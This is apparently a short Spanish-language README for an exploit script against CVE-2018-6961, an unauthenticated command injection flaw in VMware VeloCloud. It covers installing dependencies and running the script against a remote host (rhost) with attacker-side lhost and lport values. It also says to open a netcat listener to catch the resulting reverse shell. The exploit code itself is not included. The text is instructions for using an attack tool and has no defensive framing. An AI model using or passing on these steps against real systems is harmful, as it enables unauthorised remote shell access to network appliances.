
veloCloud VMWare - Vulnerabilidad
CVE-2018-6961 - VULNERABILIDAD DE INYECCIÓN DE COMANDOS NO AUTENTICADA
Este exploit funciona en Python2.7 - No probado en ninguna otra versión
1) Instalar dependencias
pip install request
si no tienes pip instalado, simplemente ejecuta
apt-get install python-pip
**2) Uso **
python exployt.py --rhost --interface --lhost --lport --function
python exploit.py --rhost 1.1.1.1 --interface ge1 --lhost 2.2.2.2 --lport 443 --function traceroute
Exploiting...................
3) No olvides configurar netcat en otra terminal
nc -vlnp 443
TODO --mejorar el script para ejecutar netcat en la misma terminal